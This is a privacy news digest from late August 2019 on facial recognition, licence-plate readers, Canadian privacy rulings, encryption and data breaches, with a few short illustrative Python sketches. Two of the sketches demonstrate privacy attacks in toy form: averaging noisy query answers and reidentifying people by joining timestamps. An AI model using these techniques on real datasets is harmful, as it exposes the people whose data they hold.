16-31 August 2019

Biometrics

US – Amazon Facial Recognition Once Again Identifies Lawmakers as Criminals

Jeff Bezos must really be getting tired of these headlines coming up all the time. Amazon’s facial recognition software (known as Rekognition) has been subjected to yet another test and come up a little short. Or a lot short, particularly if you happen to be one of the more than two dozen state lawmakers who turned up as hits when matched against a database of known criminals. The “test” in question was performed by the American Civil Liberties Union (ACLU) [read blog post here]. Of all the facial recognition software out there that we’ve looked at, Amazon’s seems to be the one that winds up producing the most spectacular (and frequently hilarious) epic fails when put to independent testing. In that light, perhaps the ACLU wasn’t off the mark. Of course, the ACLU isn’t looking to improve the technology; it ran this test so it can continue its campaign to prevent law enforcement from using the software. Democratic Assembly member Phil Ting of San Francisco (who was tagged as a felon) is quoted as saying, “While we can laugh about it as legislators, it’s no laughing matter if you are an individual who is trying to get a job, for an individual trying to get a home. If you get falsely accused of an arrest, what happens? It could impact your ability to get employment.” These types of scare tactics are all too common and should be derided. I’ve asked multiple times now and am still waiting for an answer to one simple question: does anyone have evidence of even a single instance where someone was misidentified by facial recognition and went on to be prosecuted (or persecuted, as Ting suggests) because the mistake wasn’t discovered? I’ve yet to hear of a case. Did the police show up and arrest Ting after he was misidentified? I somehow doubt it. Look, the technology is still in its infancy and it’s got a few bugs in it. They’re being worked out as the technology matures, and the error rates should eventually drop to acceptable levels. And if this software can help catch a suspect in a violent crime in a matter of minutes or hours rather than days or weeks after they were spotted by a security camera, that’s a tool the police need to have. [Hot Air]

US – Industry Groups Criticize Facial Recognition Hysteria

Some in the tech industry are pushing back on claims made recently by advocates of bans on facial recognition technology. The Security Industry Association [SIA] has published a report to combat misconceptions and provide perspective on facial biometrics [see: Face Facts: Dispelling Common Myths Associated With Facial Recognition Technology here], while the Information Technology & Innovation Foundation [ITIF] has specifically addressed recent claims by the American Civil Liberties Union [read ACLU Blog post here] that one in five California legislators were misidentified by the default settings of Amazon’s Rekognition system [here], with a statement panning the organization’s methodology. “The ACLU is once again trying to make facial recognition appear dangerous and inaccurate. But independent testing from the federal government has consistently shown that facial recognition technology is highly accurate. It now exceeds the accuracy of humans at identifying faces,” comments ITIF Vice President Daniel Castro [here]. “This is the second time the ACLU has released misleading findings. Last year, it used dubious methods to claim that facial recognition had high levels of inaccuracy, but it generated false matches by setting an artificially low confidence threshold of 80 percent instead of 99 percent. The ACLU claimed at the time that companies like Amazon were not clear about what the threshold should be. That wasn’t true then, and it isn’t true now. In the past year, Amazon has repeatedly stated that any sensitive application of facial recognition, such as for law enforcement purposes, should only be using high confidence thresholds. So, for the ACLU to repeat this kind of test a year later, while apparently not changing its methods—and still refusing to share its data—is disingenuous and misleading. Claims that are not observable, testable, repeatable, and falsifiable are not science. It’s agenda-driven public relations, and policymakers should ignore it.” The pushback also comes as Big Brother Watch [here & wiki here] has published a report calling the use of facial recognition in UK shopping centers, museums, and conference venues an “epidemic” [read PR here]. [Biometric Update]

US – Biometrics, Facial Recognition, Privacy, Security and The Law

A recent article in the L.A. Times indicated that facial recognition software proposed for use with police bodycams falsely flagged about 20% of California legislators as criminals (insert political joke here), just as a previous study showed 28 members of Congress “matched” a database of criminals. The use of facial recognition software on massive databases like those built from bodycams or dashcams has been challenged on the basis that such software is inaccurate and might lead to the wrongful arrest or even shooting of individuals based on incorrect identification. Indeed, while many states are banning the use of bodycam facial recognition, some states such as Illinois generally prohibit the collection and use of biometric information without a written policy and informed consent. [Security Boulevard]

US – Presidential Candidate Sanders Vows to Ban Facial-Recognition Technology

Sanders’ presidential campaign website [here], in detailing his criminal justice reform plans, proposes “banning the use of facial-recognition software for policing” in order to ensure law enforcement accountability and robust oversight of policing. The criminal justice reform plan emphasises the need to “place a moratorium on the use of the algorithmic risk assessment tools in the criminal justice system until an audit is completed”. The plan also states: “We must ensure these tools do not have any implicit biases that lead to unjust or excessive sentences”. It also foresees a ban on federal programs that provide military equipment to local police forces. [Engineering and Technology]

WW – Is Webcam Facial Recognition Secure Enough?

The corporate conference room is a place for confidences, a place where the leaders of an organization should feel free to throw around ideas about a company’s future, its response to a crisis, and its plans for innovation. It should be a venue where thoughts are expressed safely in the knowledge that their contents won’t leave the room. Yet, as digital communications technologies take a more central position in these high-level discussions and remote colleagues are beamed into meetings via video conference, we are encountering new questions around privacy. Advanced features such as webcam facial recognition represent the next generation of biosecurity online, but recent video conferencing-related data breaches have raised doubts over the security of facial recognition in video conferencing technology. [VC Daily]

US – Facial Recognition: Will Passenger Scepticism Jeopardise Its Future?

Widespread distrust of the technology has begun to grip major cities in the US – mainly due to a lack of clarity about how officials use it. This led to San Francisco becoming the first city in the country to ban the use of facial recognition by city authorities and police in May 2019. Although airports run by the US Transportation Security Administration (TSA) – a federal agency – have been exempted from this ban, public scepticism of the technology is rapidly expanding to the aviation sector, leaving the industry to wonder: is facial recognition’s future in jeopardy? [Airport Technology | Facial Recognition Technology: Here Are The Important Pros And Cons]

EU – European Commission Crafting Facial-Recognition Regulations

The European Commission is exploring potential regulations focused on giving EU citizens rights regarding facial-recognition data. A commission official said “the indiscriminate use of facial recognition technology” by companies or in public would be curbed with any regulations, and people would know when any data is being used. The decision to draw up regulations comes after the U.K. Information Commissioner’s Office opened an investigation into the use of facial-recognition software at the King’s Cross development site. The regulations would also follow the EU’s commitment to create ethically based laws to govern artificial intelligence. [The Financial Times]

US – Grocery Company Claims Ill. BIPA Is Unconstitutional

The legality of the Illinois Biometric Information Privacy Act is being challenged in a Cook County Circuit Court by grocery company Albertsons. Albertsons has filed a motion claiming the law is unconstitutional, arguing that it sets up many private employers for huge judgments, while the government, its contractors and financial institutions are exempt from such issues. “If the BIPA was truly enacted to protect Illinoisans’ biometric data, to leave some of the biggest employers in the state unregulated, and thus their employees unprotected, and to allow those entities the benefit of not having to comply with the BIPA is nothing short of arbitrary,” Albertsons wrote in its motion. [Cook County Record]

Canada

CA – OPC Launches Investigation into CBSA’s Use of License-Plate-Reader System

The Office of the Privacy Commissioner of Canada has launched an investigation into the Canada Border Services Agency’s use of a compromised license-plate-reader system. The license plate system used by the CBSA was targeted in a cyberattack that impacted U.S. Customs and Border Protection. “Our office has continued to engage with CBSA and has initiated an investigation into the breach with respect to CBSA records,” OPC Spokesperson Vito Pilieci wrote in a statement. The CBSA confirmed it is in the midst of its own review to determine whether Canadian citizens were affected by the incident. [CBC.ca | CBSA launches investigation after licence plate reader linked to U.S. hack | Border agency still using licence plate reader linked to U.S. hack | US Customs and Border Protection says traveler images were taken in cyberattack | CBP says photos of U.S. travelers, license plate images were stolen in data breach | CBP says traveler photos and license plate images stolen in data breach]

CA – Police Licence-Plate Readers in Charlottetown Under Scrutiny

A Charlottetown man expressed concerns over privacy after he was hand-delivered a ticket for not having renewed his vehicle registration [read coverage]. The ticket came about because a photo of his plate was captured by a licence-plate reader. These concerns are echoed by David Fraser [here & blog here], a privacy lawyer at McInnes Cooper in Halifax, who says Charlottetown residents should be asking questions whenever police deploy a new technology that collects personal information, especially by automated means. He says, “In other jurisdictions using licence-plate recognition technology has kind of come under attack from privacy regulators, for example for retaining the information for longer than is necessary,” and notes that other jurisdictions have used the information for secondary purposes like tracking individuals. Because the readers are networked cameras feeding a database, the stored records can reveal a car’s movements, Fraser said; if the database is retained, it could be used to find out where people live and work. “The police tend not to be all that transparent about everything they do, and they’ll say it is for law enforcement purposes and try to end the conversation there,” Fraser said. He said similar technology has been used by private companies to do things like repossess cars, and sometimes that information is sold to third parties. The readers automatically scan plates and compare them to information in a database to determine if there are any violations connected to the vehicle. Charlottetown police, who have been using automatic licence-plate readers on two of their vehicles for the past year, said all scanned plates are stored on a server for two weeks and any found in violation are stored for three months. Charlottetown Coun. Bob Doiron, who chairs the protective services committee, said he doesn’t think the readers raise a privacy issue, but he is open to having a discussion about the devices. [CBC News | Police licence-plate readers don’t concern Charlottetown councillor after privacy complaint | Police licence-plate readers raise privacy concerns for Charlottetown driver]
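
The two-tier retention rule the police describe is concrete enough to sketch in code. Below is a minimal Python illustration of such a policy; the record layout and field names are invented for illustration and are not drawn from the actual Charlottetown system.

```python
from datetime import datetime, timedelta

# Hypothetical sketch: plain scans kept two weeks, violation hits kept
# three months (approximated here as 90 days). Field names are invented.
RETENTION = {
    "scan": timedelta(weeks=2),
    "violation": timedelta(days=90),
}

def expired(record, now):
    return now - record["captured_at"] > RETENTION[record["kind"]]

now = datetime.now()
records = [
    {"plate": "ABC 123", "kind": "scan",
     "captured_at": now - timedelta(days=20)},
    {"plate": "XYZ 789", "kind": "violation",
     "captured_at": now - timedelta(days=20)},
]
# The 20-day-old plain scan is purged; the violation hit is kept.
records = [r for r in records if not expired(r, now)]
print([r["plate"] for r in records])  # -> ['XYZ 789']
```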

CA – Political Parties Yet to Take Privacy Measures Beyond Bill C-76

How have political parties responded since Bill C-76 went into effect? The bill requires political parties to post privacy policies on their websites stating what types of information they collect and how it is collected and protected. All the parties have adhered to Bill C-76; however, none has implemented any of Privacy Commissioner of Canada Daniel Therrien’s voluntary privacy measures, such as giving citizens access to their data and being more transparent about how personal data is used. Privacy and Access Council of Canada President Sharon Polsky said political parties are only paying lip service to the notion of protecting privacy by following only the requirements of Bill C-76. [The Canadian Press | Federal parties subject to B.C. privacy laws: watchdog | Canada’s Political Parties Won’t Say What They Know about You | Federal parties’ privacy policies meet bare minimum required by new law | Canada’s political parties don’t meet voters’ privacy expectations: OpenMedia report | What’s in your file? Federal political parties don’t have to tell you]

CA – Federal Parties Subject to B.C. Privacy Laws: BC OIPC

Federal political parties may soon face scrutiny over how they collect and use personal information about Canadian voters. In a recent ruling, B.C. privacy commissioner Michael McEvoy [read Order P19-02, 30 pg PDF here] declared he has jurisdiction to investigate how two B.C. residents’ private emails ended up on the federal NDP’s mailing list. There are no rules or oversight governing how federal parties collect, store and analyze Canadians’ personal information. While federal parties have repeatedly downplayed the level of detail they collect on individual citizens, Canadians can only take them at their word; there is no independent oversight. The major exception is B.C., where the province’s privacy commissioner can investigate provincial parties’ use of personal information. According to the ruling, McEvoy’s office received a complaint from two residents in the B.C. riding of Courtenay-Alberni in April 2018. The complainants were concerned after they received an email invitation to a meet-and-greet with Jagmeet Singh in their riding. They asked the party how it had obtained their email addresses. Eight months later, the NDP responded. McEvoy’s ruling only addressed the question of whether he had jurisdiction to investigate the federal NDP’s data operations, not the substance of the complaint itself. The ruling can also be appealed. McEvoy’s office said it could not comment on the ruling, as its investigation is continuing. It’s unlikely that any final ruling from McEvoy’s office will come before the upcoming federal election campaign. While basic information such as email addresses and phone numbers may seem innocuous, political campaigns are increasingly focused on developing data and digital operations to refine their political outreach and advertising. [The Star | Decision paves the way for federal riding associations in BC to be subject to BC’s data protection laws | Federal Political Parties Must Follow BC’s Privacy Law, Commissioner Rules | NDP leader invite spurred privacy complaint | Federal politicians could soon face B.C. privacy watchdog over party databases]

CA – OPC Publishes New Privacy Activity Sheets for Kids

The Office of the Privacy Commissioner of Canada, in collaboration with its provincial and territorial counterparts, has produced a new series of activity sheets to help young Canadians understand various privacy issues by presenting them in a visually appealing, easy-to-understand format [download here]. It is important that youth become savvy digital citizens who are able to enjoy the benefits of being online. Young people need to be equipped with the knowledge necessary to navigate the online world and participate in the digital domain while protecting their privacy. Because children go online earlier than ever before, parents and guardians should start talking to them about the digital world and online privacy much sooner than they used to [Here is a sample of four of the nine activity sheets]: 1) Privacy Snakes and Ladders [see 2 pg PDF here] is a twist on the classic children’s game that helps players learn how to make smart privacy choices by climbing up a ladder when they make a good decision or sliding down a snake because they have shared a password with a friend, for example; 2) Connect the Dots [see 2 pg PDF here] has kids complete the picture of a family with a checklist of rules they can use at home to practice good online privacy; 3) Learning About Passwords and Colour the Tablet [read 2 pg PDF here] challenges kids to create their own strong, eight-character password by filling in the blanks. It also asks them to draw a lock on a tablet, representing how a password protects an electronic device; and 4) Word Search [read 2 pg PDF here] introduces children to privacy vocabulary by having them comb through a puzzle to find words such as “post,” “click” and “footprint.” To download the activity sheets or for more activities and information, visit www.youthprivacy.ca. [News and announcements (Office of the Privacy Commissioner of Canada) | ‘Kids these days lead parallel online lives’: Alberta unveils online privacy lessons for kids]

CA – NS OIPC: Energy Dept Violated ‘Almost Every Provision’ of Access Law

Nova Scotia Information and Privacy Commissioner Catherine Tully said the province’s Energy Department violated “almost every provision” of the Freedom of Information and Protection of Privacy Act after releasing her office’s findings on an FOI request. Tully criticized the department for the length of time it took to complete the request. A citizen first made the inquiry into records on a pair of companies back in 2014. The commissioner also pointed to the department withholding 832 pages of documents when it finally fulfilled the probe. “This may have been a failure to conduct an adequate search or it may have been a failure to respond openly, accurately and completely,” Tully wrote in the report. “In either case, it was not in compliance with the law.” [CBC News]

Consumer

WW – Sharing Pet Photos Can Reveal Personal Information

While people are becoming more vigilant about sharing personal information about themselves, particularly on social media, they routinely forget to block out their contact information when sharing pet photos. Sharing a pet photo is innocuous unless the pet owner’s phone number and address on the pet’s tag are visible. That phone number can be used to reset online passwords, and it is a key identifier in public databases containing relevant information about the pet owner, including name, address and even the names of family members. [Gizmodo]

E-Government

CA – B.C. Auditor General Rates Provincial Government’s Cyber Security

If your client has a formal process to disable computer network access for employees and contractors who no longer work there, that client’s cybersecurity is better in at least one respect than that of some British Columbia government departments. The province’s Office of the Auditor General [Carol Bellringer: see here] recently audited five government departments on how well they follow controls set by the Office of the Chief Information Officer (OCIO) to restrict unauthorized access to computer data, the Auditor General’s office said in the report released Aug. 13 [read PR here, watch 4:48 min Video Statement here & 27 pg PDF report here]. With its Internal Directory and Authentication Service (commonly known as IDIR), the B.C. government gives user accounts to employees and contractors so they can log on to workstations and access online services. The audit found that for 538 IDIR accounts still in use, the corresponding user’s employment status was “non-active.” The audit did not go so far as to look for inappropriate use of accounts or actual security breaches that could result from improper accounts. The audit asked whether the ministries were formally reviewing employees’ and contractors’ IDIR access rights at regular intervals to ensure those rights are current and valid. The answer for all – except the corporate accounting services branch of the Ministry of Finance – was no. “Users that should no longer have access may still have access to government computer resources and information. This could result in unauthorized access and sensitive information being used for fraudulent activities,” the Office of the Auditor General said in the report. “Keeping electronic data safe requires a robust method for identifying users, determining what they can access and then controlling access appropriately.” The B.C. government collects sensitive information such as personal health records, social insurance numbers, birth records, and personal and government financial information. “Even a single poorly managed IDIR account could lead to fraud or to compromised government information and systems,” the Office of the Auditor General wrote. [Canadian Underwriter | B.C. government information controls inconsistent: auditor general | Government accepts all recommendations of OAG audit of internal directory account management]
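
The control at issue, reconciling directory accounts against employment status, is simple to illustrate. Here is a minimal Python sketch; the data shapes and names are assumptions for illustration, not the actual IDIR schema.

```python
# Hypothetical sketch: flag accounts that are still enabled even though
# the matching HR record shows the user as non-active.
idir_accounts = [
    {"user": "jsmith", "enabled": True},
    {"user": "mlee", "enabled": True},
    {"user": "rkaur", "enabled": False},
]
hr_status = {"jsmith": "non-active", "mlee": "active", "rkaur": "non-active"}

stale = [a["user"] for a in idir_accounts
         if a["enabled"] and hr_status.get(a["user"]) == "non-active"]
print(stale)  # accounts to disable or escalate for review -> ['jsmith']
```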

WW – Report Shows Spike in Unlawful Data Use, Access by Chinese Apps

A new half-year study in China has revealed that a large portion of mobile apps are illegally using and accessing personal information. The National Computer Network Emergency Response Technical Team/Coordination Center of China analyzed 1,000 Chinese apps and found they required an average of 25 permissions each, while 30% of apps demanded access to call logs despite that data being unrelated to their operations. The apps also averaged 20 collected data items relating to individuals or their devices, including chat logs and location data. [Caixin Global]

Electronic Records

WW – IAB Releases Second Iteration of Transparency and Consent Framework

IAB Europe and IAB Tech Lab have published the second version of the Transparency and Consent Framework. The latest iteration comes after the Interactive Advertising Bureau sought feedback on the framework in April. A group of 55 organizations and 10 national IAB chapters worked to draft the new version of the guide. The second TCF increases the number of purposes for which publishers and vendors can process personal data from five to ten and updates the legitimate-interest basis for processing personal data. “It was essential that the evolution of the framework was handled sensitively, with the final specifications able to be adopted in a manner consistent with differing business models in a wide range of operational markets,” IAB Europe CEO Townsend Feehan said. [The Drum]

Encryption

CA – Canada’s New and Irresponsible Encryption Policy (Opinion)

[This well-researched, six-thousand-word essay documents] how the Government of Canada’s new encryption policy threatens Charter rights, cybersecurity, economic growth, and foreign policy. The Government of Canada has historically opposed the calls of its western allies to undermine the encryption protocols and associated applications that secure Canadians’ communications and devices from criminal and illicit activities. In particular, over the past two years the Minister of Public Safety, Ralph Goodale, has communicated to Canada’s Five Eyes allies that Canada will neither adopt nor advance an irresponsible encryption policy that would compel private companies to deliberately inject weaknesses into cryptographic algorithms or the applications that facilitate encrypted communications. This year, however, the tide may have turned, with the Minister apparently deciding to adopt the very irresponsible encryption policy position he had previously steadfastly opposed. To be clear, should the Government of Canada, along with its allies, compel private companies to deliberately sabotage strong and robust encryption protocols and systems, then basic rights and freedoms, cybersecurity, economic development, and foreign policy goals will all be jeopardized. This article begins by briefly outlining the history and recent developments in the Canadian government’s thinking about strong encryption. Next, the article showcases how government agencies have failed to produce reliable information which supports the Minister’s position that encryption is significantly contributing to public safety risks. After outlining the government’s deficient rationales for calling for the weakening of strong encryption, the article shifts to discuss the rights which are enabled and secured as private companies integrate strong encryption into their devices and services, as well as why deliberately weakening encryption will lead to a series of deeply problematic policy outcomes. The article concludes by summarizing why it is important that the Canadian government walk back from its newly adopted irresponsible encryption policy. [Transparency and Accountability (The Citizens Lab) SEE ALSO: Australia’s data encryption laws an oppression of freedom: Joseph Carson | U.K. Home Secretary warns about Facebook potentially encrypting Messenger | Five Eyes nations demand access to encrypted messaging | Privacy concerns over Five Eyes plan to open up private messages | Five Eyes alliance calls for access to encrypted Facebook messages | Facebook is threatening to hinder police by increasing encryption, warns Priti Patel | Calls for backdoor access to WhatsApp as Five Eyes nations meet | WhatsApp And Other Encryption Under Threat After ‘Five Eyes’ Demand Access | ‘Illegitimate’ internet use under the microscope at Five Eyes meeting: Goodale]

EU Developments

EU – Spanish Supreme Court Deems Electric-Use Info to Be Personal Data

The Contentious-Administrative Chamber of the Spanish Supreme Court ruled information gathered via an individual’s use of electricity constitutes personal data. The court determined data is protected by the Organic Law 3/2018, of December 5, on the Protection of Personal Data and the Guarantee of Digital Rights when it is accessed by a third party, such as an employee tasked with the measurement of electrical activity. The ruling stems from an appeal made by the electric utility company Iberdrola against a Secretary of State for Energy resolution that gave staff members the ability to transfer billing and liquidation information. (Original article is in Spanish.) [Confidencial Judicial]

EU – Facebook Confirms EU Citizens’ Data Transcribed in Audio Capture

EU regulators may open new privacy investigations into Facebook after EU citizens’ data showed up in the social network’s audio transcriptions. Facebook initially reported no EU users were involved in the transcriptions, but it has now revealed 48 EU users had audio messages collected and transcribed by hundreds of third-party contractors. Such nonconsensual data collections may violate the EU General Data Protection Regulation. “All EU supervisory authorities in whose jurisdiction data protection violations against persons who have used Facebook Messenger have occurred are responsible for investigating the respective violations,” Hamburg Commissioner for Data Protection Johannes Caspar said, adding that cases will be taken over by respective national data protection authorities. [Politico]

UK – ICO Discusses Data Minimization, Privacy-Preserving Tactics for AI

The U.K. Information Commissioner’s Office has published a blog post to better inform the public on data minimization and privacy-preserving techniques related to artificial intelligence systems. The post from AI Research Fellow Reuben Binns and Technology Policy Adviser Valeria Gallo is part of the ICO’s call for feedback on its AI Auditing Framework. In the piece, Binns and Gallo break down what organizations may face when adopting AI systems, as well as provide the techniques to meet data minimization requirements set forth in the framework. [Source]

Facts & Stats

WW – Data Breaches Hit Record High in First Half of 2019

The number of exposed data records has 2019 on track “to be the worst year on record for data breach activity.” According to the 2019 MidYear QuickView Data Breach Report from Risk Based Security, 4.1 billion records have been exposed in data breaches so far this year, across 3,813 publicly reported incidents, up 54% from this time last year. Three breaches have made the top 10 list of the largest breaches of all time, each affecting more than 100 million records. Email addresses and passwords were exposed in approximately 70% and 65% of reported breaches, respectively. [Threatpost]

Finance

EU – EU Regulators Launch Investigation into Libra Cryptocurrency

Regulators in the European Union have launched an investigation into Facebook’s Libra cryptocurrency. The European Commission sent questionnaires as part of a preliminary information-gathering exercise to those involved with the project, per a pair of sources close to the situation. According to documents seen by Bloomberg, the commission is “currently investigating potential anti-competitive behaviour” over concerns of “possible competition restrictions” through the use of consumer data. The investigation comes after regulators from around the world asked Facebook for answers on the privacy concerns surrounding the cryptocurrency. The commission and Facebook did not comment on the probe. [Financial Times]

FOI

CA – ON OIPC Orders Government of Ontario to Share Mandate Letters

Ontario’s freedom of information law [here, here & wiki here] is based on the principle that every individual has a right to access government information. This right exists to ensure the public has the information it needs to participate meaningfully in the democratic process, and that politicians and bureaucrats remain accountable to the public. There are, understandably, some necessary exceptions to the law. Those exceptions, written into the Freedom of Information and Protection of Privacy Act as “exemptions,” are designed to strike a balance between Ontarians’ fundamental right to know and the privacy and safety of individuals. They are also meant to be limited and specific. Labour relations, solicitor-client, and certain law enforcement records are examples of information that may be exempt from disclosure. The law also allows (rightly so) for the Premier and his cabinet to engage in free discussion of sensitive issues, in private. As such, cabinet documents cannot be disclosed if they reveal the substance of deliberations of the Executive Council or its committees. Order PO-3973, which I issued on July 15 [see 37 pg PDF here], dealt with a request for the mandate letters sent by Premier Ford [here & wiki here] to all Ontario government ministers. Cabinet Office denied access to the letters based on the premise that, as cabinet documents, they are automatically exempt from disclosure. Mandate letters have become common across Canada as a means to provide direction to ministers of incoming governments. They are frequently made public. After reviewing the mandate letters, I determined that they do not reveal government deliberations, the substance of any meetings, discussions, or any other options considered by the Premier’s Office. That is why I found that the exemption did not apply, and in Order PO-3973, I directed Cabinet Office to disclose the letters by August 16. The purpose of our freedom of information law is to support the public’s ‘right to know.’ Unless government records are exempt, they should be disclosed to the public. In this case, the mandate letters do not qualify for exemption as cabinet documents. I ordered their release because Ontarians have a right to know what the government’s policy priorities are. On August 14, my office received notice that the government intends to challenge my decision in court and prevent the release of the letters. Because it is now subject to a judicial review, I will not comment further on Order PO-3973, except to say that I stand by my decision, and hope to see a swift resolution. [Information and Privacy Commissioner of Ontario Blog | Ontario fights order to release documents outlining cabinet minister priorities | Ford government sues privacy commissioner to block release of cabinet letters]

CA – Names of City Staff Who Get Bonuses Should Be Public: NS OIPC

Halifax Regional Municipality should release the names of employees who receive bonuses and the amounts of the awards, says provincial Information and Privacy Commissioner Catherine Tully [see here]. The municipality had argued that disclosure of the names of the employees and their corresponding bonus amounts would be an “unreasonable invasion” of the employees’ personal privacy. Tully concluded in her August 22 report [read REVIEW REPORT 19-07 – 8 pg PDF here] that “The public has the right to know the amount of bonuses paid to individuals even though the disclosure reveals personal information of those individual employees.” Tully said the law is intended both to protect personal privacy and to promote transparency and accountability. Tully’s report also says: “The law includes rules on how to evaluate the balance between these two interests. With respect to performance-based payments to municipal employees, the law makes clear that the balance falls in favour of accountability and transparency. I find the annual individual salary adjustment increases based on performance are bonuses or rewards and as such fall within the meaning of remuneration. HRM has provided no argument or evidence that the (bonus) payments do not fit this definition.” However, Tully also found that disclosure of the individual salary adjustment increases “would not be an unreasonable invasion” of employees’ personal privacy. … The municipality could appeal to the Nova Scotia Supreme Court. [The ChronicleHerald]

CA – Yukon OIPC Rules PSC Correctly Handled Access-to-Info Request

Yukon Information and Privacy Commissioner Diane McLeod-McKay ruled the Public Service Commission correctly handled an access-to-information request. An applicant sought information about a PSC employee from between Nov. 20, 2017, and June 30, 2018. The PSC refused to confirm or deny the existence of the records under Section 13(2)(c) of the Access to Information and Protection of Privacy Act, a decision McLeod-McKay found to be the correct one. “Looking at the [ATIPP Act] as a whole, and its purposes, it is clear that exceptions to access to information are carefully crafted to limit access only as much as necessary to protect certain interests,” McLeod-McKay said in an interview on the decision. [Yukon News]

Genetics

US – Genetic Privacy in Question with Law Enforcement’s Use of DNA Tests

Privacy advocates are taking issue with FamilyTreeDNA allowing law enforcement to use the 1.5 million records in the company’s genetic database without a warrant or proper consent from users. “Taking a DNA test does not just tell a story about me. DNA tests inevitably reveal information about many other people too, without their consent,” University of Maryland Francis King Carey School of Law Associate Professor Natalie Ram said. “Should genetic databases be allowed to make up the rules as they go along?” Meanwhile, Government Technology reports on the growing privacy concerns with increased use of facial-recognition software in U.S. airports. [The Wall Street Journal]

Health / Medical

US – ONC Working with Congress, White House on Health Care App Privacy

The U.S. Office of the National Coordinator for Health Information Technology is working with Congress and the White House on app privacy for patients. Health care groups have raised concerns about patients using third-party apps not protected by the Health Insurance Portability and Accountability Act as their data may be used in ways they are not aware of, “such as by monetizing it or using it to target advertisements,” according to the report. ONC CEO Donald Rucker said they are working with “a number of folks on better ways of doing consent” to ensure patients are aware of possible secondary uses of data, adding “most patients are actually going to be as protective of their medical information as they are of their banking information.” [Modern Healthcare]

US – Survey: Patients Trust Health Care Agencies the Most to Protect Data

A recent survey from Harvard T.H. Chan School of Public Health and Politico found that Americans trust health care and banking institutions most to protect their personal data. Of the 1,009 respondents, 75% ranked health care organizations highest when it comes to protecting personal data, despite the 32 million health care records breached this year, while social media companies and internet search engines ranked last at 10%. “Broadly, while many Americans express serious misgivings about data privacy when it comes to social media sites and internet search engines, they report substantially more trust that their private health information will remain secure,” the researchers wrote. [HealthITSecurity]

Identity Issues

EU – Irish DPC Orders End to Processing of 3.2M Citizens’ Data Tied to Public Services Cards

The Irish Data Protection Commission has ordered the Department of Social Protection to stop all processing of the personal information of 3.2 million citizens in connection to its issuance of Public Services Cards, where PSCs are issued solely for individual transactions with other public bodies. The DPC found there is no legal basis for State agencies to require citizens to have a PSC to access services, such as renewing a driver’s license or obtaining a passport. The Irish Times reports Commissioner Helen Dixon anticipates her report will give rise to public questions about the PSC card. The Fianna Fáil party has called on the DPC to release all its findings from the investigation. [DataProtection.ie]

WW – Noise-Exploitation Attack May Break Through Differential Privacy Methods

Researchers from Imperial College London and Université Catholique de Louvain have discovered a noise-exploitation attack that can break through query-based databases that use aggregation and noise to mask personal data. Imperial College London Assistant Professor and research paper co-author Yves-Alexandre de Montjoye said a party could exploit such systems by sending enough queries to eventually figure out “every single thing that exists in the database because every time you give me a bit more information. We start from one query and then we do a variation of it and by studying the differences between the queries we know that some of the noise will disappear, some of the noise will not disappear and by studying noise that does not disappear basically we figure out the sensitive information.” [TechCrunch]
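
The averaging principle behind this class of attack fits in a few lines. The toy Python sketch below is not the researchers' actual method (which works by studying variations of a single query); it only shows why fresh noise on every answer is not enough on its own, and why a properly enforced privacy budget must cut queries off before the noise cancels.

```python
import random

# Toy model: an interface adds fresh Laplace noise to every answer.
TRUE_VALUE = 1.0  # the sensitive quantity the noise is meant to hide
SCALE = 5.0       # Laplace noise scale

def noisy_answer():
    # The difference of two exponential draws is Laplace-distributed.
    noise = random.expovariate(1 / SCALE) - random.expovariate(1 / SCALE)
    return TRUE_VALUE + noise

# Repeating the query and averaging makes the noise cancel out.
answers = [noisy_answer() for _ in range(100_000)]
print(sum(answers) / len(answers))  # converges toward TRUE_VALUE
```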

US – More Ill. Employers Accused of Violating BIPA With Fingerprint Scans

Two class-action suits have been filed in Cook County Circuit Court alleging employers violated the Illinois Biometric Information Privacy Act by requiring fingerprint scans for employees. The first case involves Bolingbrook-based D&D Manufacturing, which is accused of installing the biometric time clock without due notice to employees, who also did not authorize the use of their fingerprints. The second suit against Whole Foods Market Group alleges that the identities of employees at a River Forest location were at risk from the use of a similar biometric time clock. [The Cook County Record]

US – Defendants Seek Dismissal of Privacy Suit Over EHRs

Google and the University of Chicago Medical Center have filed a motion to dismiss a class-action suit over allegations related to deidentified electronic health records. In their motion to a federal court in Illinois, Google and the medical center argued their collaboration and patient data sharing were in compliance with the Health Insurance Portability and Accountability Act. They also claimed that their data sharing did not cause the plaintiffs any harm. The initial complaint by the plaintiffs alleged the data sharing involved date stamps of when patients checked in and out of the hospital, which Google could trace back to patients. [GovInfoSecurity]
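
The timestamp-linkage risk the plaintiffs allege can be illustrated with a toy join. All data and field names below are invented; the sketch only shows how a "deidentified" date stamp becomes identifying once matched against a separately held, identified trail.

```python
# Hypothetical: "deidentified" hospital visits keyed by check-in time.
deidentified_visits = [
    ("patient_0417", "2015-06-01T09:14"),
    ("patient_0933", "2015-06-02T14:02"),
]
# Hypothetical: an identified location trail held by another party,
# e.g. times at which a known account's device was at the hospital.
identified_trail = {"2015-06-01T09:14": "jane.doe@example.com"}

for record_id, checkin in deidentified_visits:
    match = identified_trail.get(checkin)
    if match:
        print(f"{record_id} plausibly belongs to {match}")
```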

Intellectual Property

WW – Developers Accuse Apple of Anti-Competitive Behavior With Its Privacy Changes in iOS 13

A group of app developers have penned a letter to Apple CEO Tim Cook, arguing that certain privacy-focused changes in Apple’s iOS 13 operating system [see here & wiki here] will hurt their business. The developers accuse Apple of anti-competitive behavior in how apps can access user location data. With iOS 13, Apple aims to curtail apps’ abuse of its location-tracking features as part of its larger privacy focus as a company. Today, many apps ask users upon first launch to grant the “Always Allow” location-tracking permission. Users can confirm this with a tap, unwittingly giving apps far more access to their location data than is actually necessary, in many cases. In iOS 13, however, Apple has tweaked the way apps can request location data. A new option, “Allow Once,” will be presented upon launch, letting users first explore the app to see if it fits their needs before granting the developer the ability to continually access location data. It appears alongside the existing options “Allow While Using App” and “Don’t Allow.” The “Always” option is still available, but users will have to head to iOS Settings to manually enable it. (A periodic pop-up will also present the “Always” option, but not right away.) The developers argue that this change may confuse less-technical users, who will assume the app isn’t functioning properly unless they figure out how to change their iOS Settings to grant the proper permissions. The letter was signed by Tile CEO CJ Prober; Arity (Allstate) president Gary Hallgren; Life360 CEO Chris Hulls; Happn CEO Didier Rappaport; Zenly (Snap) CEO Antoine Martin; Zendrive CEO Jonathan Matus; and Jared Allgood, chief strategy officer of social networking app Twenty. It’s another example of how erring on the side of increased user privacy can lead to complications and friction for end users. One possible solution could be allowing apps to present their own in-app Settings screen, where users could toggle the app’s full set of permissions directly — including everything from location data to push notifications to the app’s use of cellular data or Bluetooth sharing. [TechCrunch | Developers Call Apple Privacy Changes Anti-Competitive]

Internet / WWW

CN – Chinese Regulator Says Apps Are Collecting Excessive Personal Data

